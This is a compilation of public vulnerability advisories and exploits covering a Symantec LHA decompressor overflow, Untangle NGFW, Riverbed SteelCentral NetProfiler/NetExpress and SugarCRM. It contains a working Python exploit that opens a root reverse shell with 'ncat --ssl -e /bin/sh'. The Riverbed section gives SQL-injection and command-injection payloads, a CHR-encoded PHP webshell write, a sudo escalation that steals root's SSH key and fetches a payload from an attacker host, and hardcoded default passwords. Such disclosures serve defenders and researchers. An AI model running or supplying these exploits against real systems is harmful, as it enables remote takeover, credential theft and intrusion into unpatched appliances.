CompanyName: Symantec Corporation
ProductName: Symantec Security Technologies
InternalName: ccScan
OriginalFilename: CCSCAN.DLL
ProductVersion: 13.1.2.19
FileVersion: 13.1.2.19
FileDescription: Symantec Scan Engine
LegalCopyright: Copyright (c) 2015 Symantec Corporation. All rights reserved.
These bugs are obviously exploitable for remote code execution on all Symantec customer machines as root or SYSTEM.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40031.zip
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=814
The dec2lha library is the library responsible for decompressing LZH and LHA archives. The CSymLHA::get_header() routine has a trivial stack buffer overflow.
.text:00023D91 31 C0 xor eax, eax
...
.text:00023DAE 8D 95 E4 FB FF+ lea edx, [ebp+var_41C]
.text:00023DB4 89 D7 mov edi, edx
.text:00023DC7 66 B9 00 01 mov cx, 100h
.text:00023DCB F3 AB rep stosd
We can see from this initialization that var_141C is a 1024 byte stack buffer, because 0x100 * sizeof(dword) = 1024. But later on in this routine:
.text:0002442C 88 0C 10 mov [eax+edx], cl ; eax = &var_41C edx=index
.text:0002442F 83 C2 01 add edx, 1 ; edx++
...
.text:00024408 81 FA 00 10 00+ cmp edx, 1000h ; if (index > 4096) ...
.text:0002440E 0F 84 E9 02 00+ jz loc_246FD ; oob
The index is checked to see if it's > 4096 bytes, this is incorrect. This is most likely a simple programmers error, bounds checking with the wrong size.
This code is typically run with SYSTEM/root privileges, I'm using Symantec Scan Engine on Linux to reproduce this issue, but all platforms and products using this code (e.g. Symantec Mail Security) are likely affected.
#0 0xf5606d95 in CSymLHA::get_header(SymLHA::_S_LzHeader*) () from libdec2lha.so
#1 0xf5607af4 in CSymLHA::GetEntry(SymLHA::_S_LzHeader*) () from libdec2lha.so
#2 0xf55e83d5 in CLHAEngine::ProcessChildren(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, CSymLHA*) () from libdec2lha.so
#3 0xf55e8a8f in CLHAEngine::Process(IDecomposerEx*, IDecContainerObjectEx*, IDecEventSink*, unsigned short*, char*, bool*, bool*) () from libdec2lha.so
#4 0xf5c137b5 in CDecomposer::DecProcess(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
#5 0xf5c143cb in CDecomposer::Process(IDecObject*, IDecEventSink*, IDecIOCB*, unsigned short*, char*) ()
(gdb) c
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
Because Symantec do not use -fstack-protector on Linux, exploitation is remarkably trivial. Exploitation is likely still possible on Windows, but may be more difficult as they do use /GS on that platform.
This issue is remotely exploitable just by receiving an email, visiting a website, and so on.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40032.zip
#!/usr/bin/python
# Title: Untangle NGFW <= v12.1.0 beta execEvil() authenticated root CI exploit
# CVE: (Not yet assigned)
# Discovery: Matt Bush (@3xocyte)
# Exploit: Matt Bush
# Contact: mbush@themissinglink.com.au
# Disclosure Timeline:
# 22/4/2016 Attempted to contact vendor after discovery of vulnerabilities
# 6/5/2016 No response from vendor, vulnerabilities reported to US-CERT (assigned VU#538103)
# 12/5/2016 US-CERT confirms contacting vendor
# 16/6/2016 US-CERT notifies of no response from vendor and suggests requesting CVE-ID following their timeline
# 27/6/2016 Public disclosure
# A command injection vulnerability exists in Untangle NG Firewall, which allows non-root authenticated users to execute system commands with
# root privileges. This exploit has been tested on Untangle NG Firewall versions 11.2, 12, 12.0.1, and 12.1.0 beta, but should work on previous
# versions. The client-side sanitisation issues identified in the disclosure post can be exploited with a web app proxy. This exploit leverages
# the vulnerable function directly. Credentials can be obtained by sniffing unsecured HTTP logins (which the appliance defaults to).
# The author is not responsible for how this script or any information within this script is used. Don't do anything stupid.
import json, requests, sys
if len(sys.argv) < 5:
print "[!] usage: " + sys.argv[0] + " <RHOST> <LHOST> <username> <password>"
print "[!] and in a separate terminal: 'ncat --ssl -nlvp 443'"
sys.exit()
print "\nUntangle NGFW <= v12.0.1 execEvil() authenticated root CI exploit"
print " by @3xocyte\n"
rhost = sys.argv[1]
lhost = sys.argv[2]
username = sys.argv[3]
password = sys.argv[4]
login_url = "http://" + rhost + "/auth/login?url=/webui&realm=Administrator"
rpc_url = "http://" + rhost + "/webui/JSON-RPC"
auth = {'username': username, 'password': password}
print "[*] Opening session..."
session = requests.Session()
print "[*] Authenticating..."
try:
login = session.post(login_url, data=auth)
get_nonce = {"id":1,"nonce":"","method":"system.getNonce","params":[]}
req_nonce = session.post(rpc_url, data=json.dumps(get_nonce))
data = json.loads(req_nonce.text)
nonce = data['result']
except:
print "[!] Authentication failed. Quitting."
sys.exit()
print "[*] Getting execManager objectID..."
try:
get_obj_id = {"id":2,"nonce":nonce,"method":"UvmContext.getWebuiStartupInfo","params":[]}
req_obj_id = session.post(rpc_url, data=json.dumps(get_obj_id))
data = json.loads(req_obj_id.text)
object_id = data['result']['execManager']['objectID']
except:
print "[!] Could not get execManager objectID. Quitting."
sys.exit()
print "[*] Exploiting Ung.Main.getExecManager().execEvil()..."
try:
exploit = {"id":3,"nonce":nonce,"method":".obj#" + str(object_id) + ".execEvil","params":["ncat --ssl -e /bin/sh " + lhost + " 443"]}
session.post(rpc_url, data=json.dumps(exploit))
except:
print "[!] Exploit failed. Quitting."
sys.exit()
print "[*] Exploit sent!"
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Riverbed SteelCentral NetProfiler & NetExpress Multiple Vulnerabilities
Affected versions: SteelCentral NetProfiler <= 10.8.7 & SteelCentral
NetExpress <= 10.8.7
PDF:
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf
+-----------+
|Description|
+-----------+
The Riverbed SteelCentral NetProfiler and NetExpress virtual appliances,
which share the same code base, are affected by multiple security
vulnerabilities, including authentication bypass, SQL injection,
arbitrary code execution via command injection, privilege escalation,
local file inclusion, account hijacking and hardcoded default
credentials. Details for other low severity vulnerabilities (i.e.
cross-site scripting) are available in the accompanying PDF.
+------------+
|Exploitation|
+------------+
==SQL Injection==
The ‘username’ POST parameter in the login method of the common REST API
is vulnerable to SQL injection via stacked queries. An attacker can
exploit this vulnerability to add a user account in the application’s
PostgreSQL database and successfully bypass authentication. The
exploitation of this vulnerability can also be replicated from the main
web GUI login functionality as login calls are routed to the same common
REST API web service.
The proof-of-concept request below shows how to exploit the SQL
injection vulnerability to add a malicious user account into the ‘users’
table of the application database. Since quote characters can't be used
as part of the injection payload, an attacker needs to use string
concatenation to insert the field values (i.e. 'user' =>
CHR(117)||CHR(115)||CHR(101)||CHR(114)).
[POC SQL INJECTION - INSERT USER]
Method => POST
URL => /api/common/1.0/login
Content-type => application/json
Payload => {
"username": "test%';INSERT INTO users (username, password, uid) VALUES
(<user>, <SHA512 hash>, <random id>);--",
"password": ""
}
Additional SQL Injection vulnerabilities exist in the application’s web
interface and can be exploited after authentication.
Method => GET
URL => /popup.php?page=export_report
Parameter => report_id
POC Payload => 1';SELECT PG_SLEEP(5)--
Method => GET
URL => /popup.php?page=algorithm_settings
Parameter => id
POC Payload => 1';SELECT PG_SLEEP(5)--
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_names
POC Payload => ') AND 9625=(SELECT 9625 FROM PG_SLEEP(5)) AND
('Pdyu'='Pdyu
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_numbers
POC Payload => 1-100) AND 5045=(SELECT 5045 FROM PG_SLEEP(5)) AND (2272=2272
Method => POST
URL => /index.php?page=port_config
Parameter => PortsSelectControl/ports_config/port_proto
POC Payload => ');SELECT PG_SLEEP(5)--
All the SQL injections above can be trivially exploited to write
malicious PHP code into a directory under the application web root
folder, such as one used for file uploads, and obtain arbitrary code
execution.
[POC SQL INJECTION - WRITE WEBSHELL]
GET
/popup.php?page=export_report&report_id=1';COPY+(SELECT+CHR(60)||CHR(63)||CHR(112)
||CHR(104)||CHR(112)||CHR(32)||CHR(101)||CHR(99)||CHR(104)||CHR(111)||CHR(32)||CHR(115)
||CHR(121)||CHR(115)||CHR(116)||CHR(101)||CHR(109)||CHR(40)||CHR(36)||CHR(95)||CHR(71)
||CHR(69)||CHR(84)||CHR(91)||CHR(34)||CHR(99)||CHR(109)||CHR(100)||CHR(34)||CHR(93)
||CHR(41)||CHR(59)||CHR(32)||CHR(63)||CHR(62))+TO+$$/usr/mazu/www/tmp/imports/shell.php$$;--
&export_type=3
==Command Injection==
Multiple command injection vulnerabilities exist in the appliances’ web
interfaces due to unsanitized user-supplied input passed as argument to
shell functions. An attacker can exploit these vulnerabilities to inject
shell commands and obtain arbitrary code execution.
URL => GET
/popup.php?page=test_connection&device=<PAYLOAD>&type=switch
Parameter => device
POC Payload => 1; touch /tmp/FILE;
URL => POST /index.php?page=licenses
Body => xjxfun=get_request_key&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter => xjxargs[]
POC Payload => LICENSE-TOKEN; id;
Notes => Token Request functionality in 'Licenses' page
URL => GET /popup.php?page=packet_export&query=<PAYLOAD>
Parameter => query
POC Payload => 1; touch /tmp/MYFILE;
URL => POST /index.php?page=network_config
Body => <configuration params>&Setup/setup/network_hostname=<PAYLOAD>
Parameter => Setup/setup/network_hostname
POC Payload => 1; touch /tmp/MYFILE;
Notes => 'Configure now' functionality, injection occurs after
appliance reboots.
URL => POST /index.php?page=product_info
Body => xjxfun=delete_collect&&xjxr=<value>&xjxargs[]=<PAYLOAD>
Parameter => xjxargs[]
POC Payload => 1; touch /tmp/MYFILE;
Notes => 'Delete collected entry' functionality
==Privilege Escalation==
An insecure configuration of the /etc/sudoers file allows privilege
escalation to root. The ‘apache’ user is allowed to run multiple scripts
under the /usr/mazu/bin directory without being prompted for a password,
including the following sudoers entry:
/usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date*
The ‘mazu-run’ script can be used to invoke the /bin/date binary in the
context of the built-in ‘mazu’ user. An attacker can abuse the mazu-run
script to run the /bin/date binary with the –f flag against a sensitive
file such as the root private SSH key. The ‘–f’ option instructs the
‘date’ binary to parse the file specified as a DATEFILE. By default, the
command ‘date’ will echo back an error message with the contents of the
specified file when this does not comply with a valid DATEFILE format.
This technique can be exploited to get the root SSH private RSA key and
write it into the appliance filesystem using output redirection. An
attacker can then establish a SSH connection to the target system by
using the dumped private key to authenticate as root and spawn a root
reverse shell. The POC payload below shows how to exploit the vulnerability.
[POC PRIVILEGE ESCALATION]
sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f
/opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4-
| tr -d '`' | tr -d "'" > /tmp/root_ssh_privatekey; chmod 600
/tmp/root_ssh_privatekey; ssh -o UserKnownHostsFile=/dev/null
-o StrictHostKeyChecking=no -i /tmp/root_ssh_privatekey root@localhost
'nc -n [attacker ip] 4444 > /tmp/shell.elf;
chmod 755 /tmp/shell.elf; /tmp/shell.elf';
==Local File Inclusion==
A local file inclusion vulnerability exists in the
‘sensor/ta_loader.php’ file due to a lack of input sanization for the
GET parameter ‘class’. This allows an attacker to read or include
arbitrary files.
As a practical exploitation scenario, an attacker can obtain arbitrary
code execution through the LFI vulnerability by first using the ‘Edit
/etc/hosts’ functionality available under
‘/index.php?page=network_config’ to create a fake host entry (e.g.
'192.1.2.3 <?php echo system($_GET["cmd"]); ?>' ) and write malicious
PHP code on the appliance filesystem, then include the /etc/hosts file
and execute arbitrary shell commands.
[POC LFI]
curl https://<host>/sensor/ta_loader.php?cmd=<COMMAND>&class=/etc/hosts
==Account Hijacking==
The password change functionality under the
‘/index.php?page=security_compliance’ page is vulnerable to a logic bug
which allows account hijacking via arbitrary password reset. Although
the functionality prompts for the current account password before
allowing the user to set a new password, the hashed credentials of all
the system accounts on the SteelCentral NetProfiler and NetExpress
appliances are disclosed within the ‘accountscredentialsid’ hidden
parameter in the page source code. The contents of the parameter are the
base64-encoded representation of a serialized PHP object containing the
credentials data.
This not only openly discloses the contents of the /etc/shadow file, but
can be also abused to carry out arbitrary password resets since the
current password verification is carried out on client-side against the
‘oldpassword’ field value within the serialized string. An attacker can
first generate a valid SHA-512 hash for an arbitrary current password
value along with computing the hash length. Then the password change
HTTP request can be intercepted to decode the base64-encoded serialized
object and modify the ‘oldpassword’ hash value and its length for the
target system account to hijack with the generated SHA-512 hash of the
chosen current password value. The malicious string can now be base64
encoded back and used to replace the original request string.
After clicking the ‘Configure Now’ button the application will validate
the current password value provided through the web interface against
the injected hash value, successfully setting the new password to the
arbitrary value chosen by the attacker.
==Hardcoded default credentials==
Multiple system accounts are configured on every deployment of the
SteelCentral NetProfiler and NetExpress virtual appliances with the same
hardcoded default credentials publicly available on the web.
Users => mazu, dhcp, root
Password => bb!nmp4y
The default ‘mazu’ user sudo configuration allows the execution of all
shell commands as root without being prompted for a password. The user
'mazu' is the only privileged user account having remote SSH access to
the SteelCentral NetProfiler and NetExpress appliances (root SSH access
is restricted to localhost only). However, the application does not
enforce a password change for the built-in 'mazu' user during
configuration time or after the first login. These insecure settings can
be exploited as a remote backdoor to gain a privileged SSH shell to the
target system.
+----------+
| Solution |
+----------+
Upgrade Riverbed SteelCentral Netprofiler/NetExpress to version 10.9.0.
At the time of this writing, although the account hijacking
vulnerability has been resolved, the contents of the /etc/shadow file
are still disclosed in the hidden parameter ‘originalsettingsid’ when
browsing to ‘/index.php?page=security_compliance’.
+------------+
| Timeline |
+------------+
24/03/2016 – Initial disclosure to Riverbed.
25/03/2016 – Vendor confirms receipt of advisory.
18/04/2016 – Sent follow up email asking for a status update
19/04/2016 – Vendor replies engineering team is working on software patches.
13/06/2016 – Vendor releases patched software build.
27/06/2016 – Public Disclosure
+------------+
| Additional |
+------------+
http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf
---------------------------------------------------------
SugarCRM <= 6.5.18 Two PHP Code Injection Vulnerabilities
---------------------------------------------------------
[-] Software Link:
http://www.sugarcrm.com/
[-] Affected Versions:
Version 6.5.18 CE and prior versions.
[-] Vulnerabilities Description:
1) The vulnerable code is located in the /include/utils/array_utils.php script:
99. function override_value_to_string_recursive2($array_name, $value_name, $value, $save_empty = true) {
100. if (is_array($value)) {
101. $str = '';
102. $newArrayName = $array_name . "['$value_name']";
103. foreach($value as $key=>$val) {
104. $str.= override_value_to_string_recursive2($newArrayName, $key, $val, $save_empty);
105. }
106. return $str;
107. } else {
108. if(!$save_empty && empty($value)){
109. return;
110. }else{
111. return "\$$array_name" . "['$value_name'] = " . var_export($value, true) . ";\n";
112. }
113. }
114. }
The "override_value_to_string_recursive2()" function is being used to save an array into a configuration file with a .php
extension. However, this function does not properly escape key names, and this can be exploited to inject and execute
arbitrary PHP code through e.g. the following URL, which will write arbitrary PHP code into the config_override.php file:
http://[host]/[sugar]/index.php?module=Connectors&action=RunTest&source_id=ext_rest_insideview&ext_rest_insideview_[%27.phpinfo().%27]=1
2) The vulnerable code is located in the /modules/UpgradeWizard/upload.php script:
117. $manifest_file = extractManifest($tempFile);
118.
119. if(is_file($manifest_file)) {
120. require_once( $manifest_file );
The vulnerability is caused by the Upgrade Wizard module, which allows to upload a package with an arbitrary manifest.php
file that will be executed by the application. This can be exploited by authenticated administrator users to upload and
execute arbitrary PHP code.
[-] Solution:
Update to version 6.5.19 CE or higher to mitigate the first vulnerability.
No official solution is currently available for the second vulnerability.
[-] Disclosure Timeline:
[29/10/2014] - Vendor notified
[15/12/2014] - Version 6.5.19 CE released: http://bit.do/sugar6519
[29/04/2015] - CVE number requested
[23/06/2016] - Public disclosure
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for these vulnerabilities.
[-] Credits:
Vulnerabilities discovered by Egidio Romano.
[-] Original Advisory:
http://karmainsecurity.com/KIS-2016-05